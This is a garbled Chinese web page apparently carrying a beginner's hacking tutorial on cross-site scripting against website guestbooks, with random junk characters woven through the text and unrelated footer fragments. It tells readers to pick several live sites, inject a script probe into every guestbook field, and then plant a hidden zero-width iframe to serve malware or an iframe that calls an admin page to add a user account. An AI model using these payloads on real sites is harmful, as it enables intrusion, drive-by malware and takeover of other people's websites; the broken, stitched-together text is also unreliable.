软件简介:
) ^5 ^; x$ I. b2 I大家好 我是游牧 我们今天继续我们的系列教程 上次和大家讲了用默认数据库来入侵,但是由于现在的网络管理员的安全意识与日俱增
$ V$ e/ Y$ o, Z7 S0 g9 T2 J所以 这招也并不是屡试不爽 今天给大家提供一个新的思路----跨站(XSS) 当然 为了适合广大菜鸟的知识水平 这节课同样很简单
8 P. U4 l1 K& @9 F) Y8 J没有对读代码有任何的要求 我们不懂代码 也能跨站
3 N( G. U1 D+ I; k3 U" l1.发现漏洞
; F: I# O" z) F- U. P5 _/ g% t好了 那我们就开始吧 当然 首先还是要找几个网站 最好多找几个 因为这个漏洞不一定每个都有 下面大家看操作吧6 H/ v# ^& l- l# w7 s4 m
大家点开留言板 在每个能填的地方填入下面的代码 然后查看原代码 查找 scriptalert(/haha/)/script 看到了吗3 K6 h6 d5 \6 n9 O; \
好了 现在带领大家来读一读代码 以便进步阿 不能总停留在原地嘛 + F% O/ ^6 Z) B7 W0 q+ r# ]# A
好了 下面我们要来利用这个漏洞' z5 A3 r! u& D2 R
2.利用漏洞
8 x3 V% x8 |2 t& e) h4 G% D利用一 挂马
; D% s. e+ r: d# Niframe scr=http://www.baidu.com width=0/iframe! i/ y G% U9 ~
利用二 加用户2 P; V5 G0 p* R$ `* n% r
iframe scr=/admin/saveadmin.asp?action=add/iframe* s* ~- v8 [; ?( o
QQ:273691522! n' @9 }9 I; M e/ d5 n
下载地址:
|
鲁公网安备 37132602371510号
流量统计
最新整理Linux手工服务端_末世策略塔防手游
